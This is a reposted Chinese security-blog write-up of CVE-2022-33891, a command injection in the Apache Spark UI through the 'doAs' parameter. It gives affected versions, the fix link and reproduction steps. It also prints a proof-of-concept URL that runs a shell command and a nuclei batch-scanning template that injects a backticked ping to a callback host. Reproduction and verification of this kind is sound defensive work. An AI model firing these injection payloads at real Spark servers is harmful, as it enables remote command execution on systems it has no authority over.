Apache Spark UI 命令注入漏洞(CVE-2022-33891)

admin 2022年7月21日18:22:28评论87 views字数 764阅读2分32秒阅读模式

影响版本:

3.0.3 and earlier, versions 3.1.1 to 3.1.2, and versions 3.2.0 to 3.2.1.

Fix:

https://github.com/apache/spark/pull/36315/files

直接拼接 bash -c执行导致漏洞的产生。

复现

下载:https://archive.apache.org/dist/spark/spark-3.2.1/spark-3.2.1.tgz

cd assembly
mvn package -DskipTests
cd ../bin
./spark-shell --conf spark.acls.enable=true

poc:http://172.16.2.1:4040/?doAs=open%20-a%20Calculator


Apache Spark UI 命令注入漏洞(CVE-2022-33891)


nuclei批量验证脚本:

id: apache-spark-shell-rce
info: name: apache-spark-shell-rce author: tangxiaofeng7 severity: high reference:   - https://github.com/tangxiaofeng7 tags: rce
requests: - method: GET   path: - '{{BaseURL}}/?doAs=`ping%20{{interactsh-url}}`'
   matchers:     - type: word       part: interactsh_protocol       name: http       words:         - "http" - "dns"



Apache Spark UI 命令注入漏洞(CVE-2022-33891)


原文始发于微信公众号(白帽子飙车路):Apache Spark UI 命令注入漏洞(CVE-2022-33891)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年7月21日18:22:28
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Apache Spark UI 命令注入漏洞(CVE-2022-33891)https://cn-sec.com/archives/1191678.html

发表评论

匿名网友 填写信息